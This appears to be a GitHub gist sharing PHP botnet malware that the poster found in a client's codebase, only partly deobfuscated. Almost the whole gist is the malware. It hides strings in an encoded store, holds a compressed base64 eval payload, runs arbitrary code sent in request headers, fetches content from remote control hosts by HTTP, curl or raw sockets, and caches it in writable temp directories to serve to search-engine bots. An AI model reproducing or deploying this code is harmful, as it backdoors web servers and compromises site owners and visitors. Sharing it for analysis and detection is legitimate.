The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.
<?php | |
if (!function_exists('get_string')){ | |
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYvdHYya2dRL2xjMktJcHN5Zlg1Z1hsY3ppZFFTaTZXY2pnUXFGU2xrVVhOa2xnMU5yTE5wVkhFLzM0eis3Q1h4RW52bWg4S083TXpPNC92bXlIWkVPMWtUVGRKUnRkYVowMHJXbXlUYkZYbFJVZlhYOGhtbjhWVmttZEVsVVFibW0rMDB5Qkk3ZFEyeU5ucHpMSm00WXo0WkxxOHZ0YkpDMmxPdGtsYzVGV3lwVnBWN0tsK1RncGE3WXVNcUNiZzlOQjRlcURWSmttcEJqYmdMelRBV0RnTHcxQkhzNkVGbjhGc2tBYTJuYWFwNWhpa0IvZVpKVHNBaWRBeGE0MmhRZnFnTVVxeUpDcHBwZFVDdTI4UXg5SU5nZzlJSUE5TTVhRkZSU2UrNHRMRlExMkVDWUZhL2dnZmpEZWpPTThxbWxWbFk4SUYvN2FsRTVPSWdOZ25GcEhaMlBRZ2p5NDRxdk1qVEdObWFGcFNmSjdNVUVSL0ppVzRFREZqbVU0RHNHS25FUDVJbkdvaUtmQ2xMU2tEaDczcUhQMkVvVFZyVFp3bk1pZnNhTUtMUVM2VzgrdndaaEhCZndiNW41SGFsZ3RxanY2aDRhdkorUE5rYm14V0VQcUhpdlBKWWptZkx1Ymo2ZTBsWEJBOTlyNytSVGlkVGk0V2krRHZTYmhjR01SaktZQkh6bVlzZVR3YjhoNmFpdmRGR3NWcFhsTGxGTXRCdDd2cVdST1hvUWlObVNaV2UyQVF5UEtocVNyVGtWWEZGdUlRUU9lYk1vOS81RHVhTmEwL3NIajd3MWVERlJrTTgwZmpDeVI4ZUNlQ2x0WG1uQnpERTBMYTdQYXlmUkMvbmI4bUMvSWlLblU0ZTFvOSsvZ1NXcEdyeGVMbU45dTB2aFhmc3F1OHJINUhOZmEwQXg1MWVJL1pBUVBlemRWTkZONDI3V003TnVMRXhQTXZrL2x0RUU1YmZDOUxXbndhUHdCbTBEZzN4b3hMQjArUFNBWW5IL0NQaUU4bloyZEVlOFUzNUZNai9nTmUwMlRLeEl3RFpKWEgyTTZBVWRGb0krc3Q2WW4xQlNNZStuT1g1bXVxZGVvM0d0SWs2TzB6WkJpaGZXZmROM2hPdHUzM1FJLzV4RC9vRHN0aWhSb1h4ZXBab1NISFpkQlN3R2E3Y09TNFIwY2VBdEJEWk5WaytsUWtGV1ZOQ3Y4TUJuRkl4WXRzSDd3TDdDV2FqaXNwNU1lSkR0UkhHMkdJWDZrTm5hdTVRb21JcGZhZjd5c29PTTlJaUZ3T1dvQk1NRW5qeDF4NU94S1NxNXRDVWVtaWdjZTZTRncwV2Y0NnJFcHZDWDJBQ1JqcXZPMzVVR3VrRGtMSDdnbSs1MnczOHh1eEl3WUZ4NmlsU055QkdES1FJT2dsUmRMMTJIeEFHTUJaa0NxaVhnOGNEWmdJNkRnSUZOR2dGbkV3K2E4cHRKYVlmbGtWVlo3bVQ3VFFScWZSN1dRT1VMcHI5SzBlSTFOc3RFMWUwRlg4Q0hXTkVOQ3Jrb2hrK244MldjZTZnOGxkenRzZURwdDZ1d2pZUHRhYldiZ1QxKy85Rmo2VE0rbDlXeERKNEwvWk9zQ3J0Sk9rWk5CNUcyTFhaVjE5enlmdSszTEczMi9GUFp1TGtUSmJVNGhkRG0xeC95dnpwcm9DREJGOU9Pbytzc2l4SUprYTJOdVhaVzI3VmNmSmhnS2NCLzVvdS9ia01EQkZYNXFDWjBVejh0NkQxa3Y5ZFZKa0t5QytLTG9NcmlkUnBKdWZnemtNdTNEK0ZiemRqT2RqK0NpMmdpQ29XVWFOYWlnMm9wYjNkUjFBYUZlL2J4ZTZGa0tFQ3lmVEwrOWNPNWE0ckVWYUpkS2FDSzJoZ3k0dVNsMjlWUUw5NUxTTGtGd2NCK042cytGNURFRkRYU1ZTai9zM3lCR3FSTm9RVjdnSHdGemdjRG9SaTRBNGxOdFlhcHQrYS83NXBsbEd5S2lyN3lrOXZzbWVqdHNZUHp3bjM4SC9qM3BDVk51ZC95WStqMitrcG1nYjRhS3VVZ2ZIZVBRMUdpOFhWNTE3M3hkcWtvTWxvNDRFVnl0bVdZRU15WWlLUTQrUGRrR2lxcUNQbWF2M2s1UU5HRUdPYmVqekdFMGkrbkRLMEg5V3Fid0ZObjd4UEp3TTNhTzZJZis3T3B0QnNDTlhtc1UreW9Uelh4V1FRZWFyeXZmeEkvL0tmaHpFNlg1Tm96eUxxVHprTE1kWE5BVHZDRFpCbXNVNHhjV1JKR3EyUDQ4K3BtcHZ5R2ZGRVZYTGJhTFc2dGtJUVRXb0hzNStENlo2M1htMi9ZckkrUk9NV25yaSs1ZHNjK1pxYXFqOFJ4UU9lblZWN1BVQk8zYVhUMWt3MGhTME4reGlrbVZyTllLK3hSYW1saDdvMitJSzd4bzJBQU5PT00xUE83Ym93SUxVL0xvN2YxV1N3M0hudzkrL2t4VVhuQT09IikpKTs(cHJlZ19yZXBsYWNlu&'; | |
function get_string($a, $b){ | |
$c=$GLOBALS['string_store']; | |
$d=pack('H*','626173'.'6536345f6465636f6465'); | |
return $d(substr($c, $a, $b)); | |
}; | |
} | |
if (!defined("determinator")){ | |
function determinator_feof($IIl1l1, &$Q00QOQ = NULL) { | |
$Q00QOQ = microtime(true); | |
return feof($IIl1l1); | |
} | |
function getfile($Q0Q0QO, $QOQOOO){ | |
$QO0OQO = get_string(2, 6); | |
$IIl11I = $QO0OQO.get_string(9, 7); | |
@ini_set(get_string(17, 20), 1); | |
if (@ini_get(get_string(17, 20)) == get_string(37, 2)) { | |
$Q0Q000=@file_get_contents(get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(51, 30)); | |
return $Q0Q000; | |
} elseif (function_exists($IIl11I)){ | |
$I1ll1l = @$IIl11I(); | |
$IIlIl1 = $QO0OQO.get_string(82, 10); | |
$Q0OO0Q = $QO0OQO.get_string(95, 7); | |
@$IIlIl1($I1ll1l, CURLOPT_URL, get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(103, 12)); | |
@$IIlIl1($I1ll1l, CURLOPT_HEADER,false); | |
@$IIlIl1($I1ll1l, CURLOPT_RETURNTRANSFER,true); | |
@$IIlIl1($I1ll1l, CURLOPT_CONNECTTIMEOUT, 5); | |
$QQOQQQ = @$Q0OO0Q($I1ll1l); | |
@curl_close($I1ll1l); | |
if (empty($QQOQQQ)){ | |
$QQOQQQ = get_string(118, 0); | |
} | |
return $QQOQQQ; | |
} else { | |
$IIl1l1 = @fsockopen($Q0Q0QO, 80, $QOQ0Q0, $I1lI11, 5); | |
if ($IIl1l1) { | |
$Q0OQ00 = get_string(118, 0); | |
$Q00QOQ = NULL; | |
@fputs($IIl1l1, "GET {$QOQOOO}&way=socket HTTP/1.0\r\nHost: {$Q0Q0QO}\r\n"); | |
$II1I1I = PHP_OS.get_string(121, 2).PHP_VERSION; | |
@fputs($IIl1l1, "User-Agent: {$II1I1I}\r\n\r\n"); | |
while(!determinator_feof($IIl1l1, $Q00QOQ) && (microtime(true) - $Q00QOQ) < 2){ | |
$Q0OQ00 .= @fgets($IIl1l1, 128); | |
} | |
@fclose($IIl1l1); | |
$Q0OOQO = explode("\r\n\r\n", $Q0OQ00); | |
unset($Q0OOQO[0]); | |
return implode("\r\n\r\n", $Q0OOQO); | |
} | |
} | |
} | |
$QQ00OQ = Array(get_string(123, 10), get_string(133, 23), get_string(159, 15)); | |
function write($QQOOOO,$QO0OOQ){ | |
if ($IIIlI1=@fopen($QQOOOO,get_string(177, 2))){ | |
@fwrite($IIIlI1,$QO0OOQ); | |
@fclose($IIIlI1); | |
} | |
} | |
function output($Q0OOOO, $IIllIl){ | |
echo get_string(182, 3).$Q0OOOO.get_string(185, 2).$IIllIl."\r\n"; | |
} | |
@ini_set(get_string(189, 19), 0); | |
define(get_string(211, 16), 1); | |
$QO0OQQ=get_string(229, 7); | |
$QQOQQ0=get_string(238, 6); | |
$QOO00Q=get_string(245, 20); | |
$IlI1Il=get_string(266, 18); | |
$I11III=get_string(286, 18); | |
$Q0Q0QO=get_string(39, 10); | |
$Q0Q0QO.=strtolower(@$_SERVER[get_string(306, 12)]); | |
foreach ($_GET as $Q0OOOO=>$IIllIl){ | |
if (strpos($IIllIl,get_string(321, 7))){ | |
$_GET[$Q0OOOO]=get_string(118, 0); | |
} elseif (strpos($IIllIl,get_string(329, 8))){ | |
$_GET[$Q0OOOO]=get_string(118, 0); | |
} | |
} | |
if(!isset($_SERVER[get_string(343, 15)])) { | |
$_SERVER[get_string(343, 15)] = @$_SERVER[get_string(361, 15)]; | |
if(@$_SERVER[get_string(377, 16)]) { | |
$_SERVER[get_string(343, 15)] .= get_string(393, 2) . @$_SERVER[get_string(377, 16)]; | |
} | |
} | |
if ($IIlI1l=$Q0Q0QO.@$_SERVER[get_string(343, 15)]){ | |
$IIIlII=@md5($Q0Q0QO.$QQOQQ0.PHP_OS.$QOO00Q); | |
$Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR; | |
$IIlIII = Array( | |
get_string(399, 20), | |
@$_SERVER[get_string(422, 4)], | |
@$_SERVER[get_string(430, 6)], | |
@$_ENV[get_string(422, 4)], | |
@$_ENV[get_string(439, 8)], | |
@$_ENV[get_string(430, 6)], | |
$Il1Ill.get_string(451, 4), | |
$Il1Ill.get_string(458, 24), | |
$Il1Ill.get_string(482, 22), | |
@ini_get(get_string(506, 19)), | |
get_string(530, 6), | |
); | |
foreach ($IIlIII as $I1lll1){ | |
if (!empty($I1lll1)){ | |
$I1lll1.=DIRECTORY_SEPARATOR; | |
if (@is_writable($I1lll1)){ | |
$Il1Ill = $I1lll1; | |
break; | |
} | |
} | |
} | |
$tmp=$Il1Ill.get_string(537, 2).$IIIlII; | |
if (@$_SERVER["HTTP_Y_AUTH"]==$IIIlII){ | |
echo "\r\n"; | |
@output(get_string(539, 8), $QQOQQ0.get_string(551, 2).$QO0OQQ.get_string(557, 6)); | |
if ($IlIlI1=$IlI1Il(@$_SERVER[get_string(566, 16)])){ | |
@eval($IlIlI1); | |
echo "\r\n"; | |
@output(get_string(585, 4), get_string(589, 3)); | |
} | |
exit(0); | |
} | |
if (@is_file($tmp)){ | |
@touch($tmp); | |
@include_once($tmp); | |
} else { | |
$IIlI1l=@urlencode($IIlI1l); | |
$Q0Q00Q = @strtolower(@$_SERVER[get_string(595, 20)]); | |
foreach (explode(get_string(619, 2), get_string(623, 55)) as $I1ll11){ | |
if (strpos($Q0Q00Q, $I1ll11)!==False){ | |
if (@touch($tmp)){ | |
$QOQOOO = get_string(678, 14).$IIlI1l.get_string(694, 4).$IIIlII.get_string(701, 12).$QO0OQQ.get_string(714, 4).$QQOQQ0; | |
$I1IIII = getfile($QQ00OQ[0], $QOQOOO); | |
@touch($tmp); | |
} | |
break; | |
} | |
} | |
} | |
} | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment